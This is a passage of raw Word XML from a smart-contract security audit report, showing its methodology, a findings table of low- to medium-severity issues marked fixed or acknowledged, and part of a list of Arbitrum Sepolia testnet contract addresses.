          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>subgraph/ indexing infrastructure (except entity/query completeness)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B336D54" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The Graph hosted infrastructure and browser wallet implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6E9A81" w14:textId="0AAA46A9" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="00707638">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4468E3" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>3.1 Tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5178B823" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Slither — static analysis for reentrancy, uninitialized state, dangerous tx.origin, incorrect equality, unchecked calls, and upgradeable contract patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3CF14E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Foundry — forge test (unit), property-based fuzzing on AMM swap/mint paths, invariant tests on lending solvency and vault share accounting, plus dedicated security regression tests for S-01 and S-02.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0087A649" w14:textId="000207F8" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Manual review — architecture walkthrough, trust-boundary mapping, CEI/reentrancy checks, oracle manipulation paths, governance parameter review, and upgrade authorization on UUPS implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FB53E2" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DEB5057" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>3.2 Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0F593" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Reconnaissance — README, deployment artifacts (deployments/arbitrum-sepolia.json), and deploy script ordering (governance, oracle, AMM, vault, lending).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9C073" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Automated pass — Slither on contracts/ excluding mocks; triage each High/Medium with manual confirmation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE8D086" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Dynamic verification — full test suite and coverage report; PoC tests written for High findings on vulnerable snapshots.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9468DD" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Threat modeling — centralization, governance (flash loan, whale, spam, timelock bypass), and oracle (manipulation, staleness, depeg).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A87CB5D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Remediation tracking — each finding assigned ID, severity, fix PR/commit, and regression test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC1A679" w14:textId="069189E7" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>Reporting — this document with reproducible PoCs and recommended patches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061333EE" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425A4899" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:t>4. Findings Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02DCE1F7" w14:textId="56514AB6" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="360" w:right="116"/>
        <w:rPr>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-KZ"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07ABFF1D" wp14:editId="359B72E4">
            <wp:extent cx="4204009" cy="2203497"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35740892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08929" name="Рисунок 35740892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16095" cy="2209832"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2031" w14:textId="77777777" w:rsidR="004C355C" w:rsidRPr="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The table below summarises all findings identified during this audit. S-07 and S-08 were the two highest-severity issues (Medium); both have been remediated. No High or Critical issues were found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2032" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ID: S-01 | Severity: Low | Title: Frontend subgraph URL placeholder | Status: Fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2033" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-02 | Severity: Informational | Title: Testnet mock oracle not a production Chainlink feed | Status: Acknowledged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2034" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-03 | Severity: Gas | Title: CREATE2 address prediction hashes dynamic bytecode | Status: Acknowledged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2035" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-04 | Severity: Informational | Title: Forge lint naming notes | Status: Acknowledged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2036" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-05 | Severity: Low | Title: Slither timestamp warnings (deadline / interest / staleness) | Status: Acknowledged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2037" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-06 | Severity: Optimization | Title: Lending pool risk parameters could be immutable | Status: Acknowledged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2038" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-07 | Severity: Medium | Title: AMM liquidity removal updated reserves after LP burn | Status: Fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2039" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-08 | Severity: Medium | Title: Lending strict-equality patterns | Status: Fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA203A" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ID: S-09 | Severity: Low | Title: Oracle round metadata validation incomplete | Status: Fixed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA203B" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Deployment Addresses — Arbitrum Sepolia (Chain ID 421614)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA203C" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Governor: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x984D39607bbCCd72e0B0DdD5199096463618Fc8E</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA203D" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Timelock: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x4FD144d3a8dCDcf00bF972D6f1c1C99768d9bF2A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA203E" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">GovernanceToken: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x21027006896891F92d1D49e941857bbE0801eFc2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA203F" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Treasury: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xb8C67c7d84A7B2F0ab57985A8B3125770F711497</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2040" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AMM Pool: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xF3742E21a6a6aAB08F6342C18E1a248e103fD987</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2041" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Factory: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x0f6b5a65782b9bb1128a315f93fc6e384063f362</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2042" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">LendingPool: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x4282C3B7546583Cc02B6B8b00E586D78Efe5e968</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2043" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">YieldVault: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xe932301FAc4Be15631DCB872f1Db48aE0035b9cE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2044" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xAC0fCDc995629984E9F772aB32cbacaa296E8e60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2045" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ConfigProxy: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0xEAb2819f4C87DF04092DD503193838586492F5B6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2046" w14:textId="77777777" w:rsidR="004C355C" w:rsidRDefault="004C355C" w:rsidP="004C355C">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:right="116"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
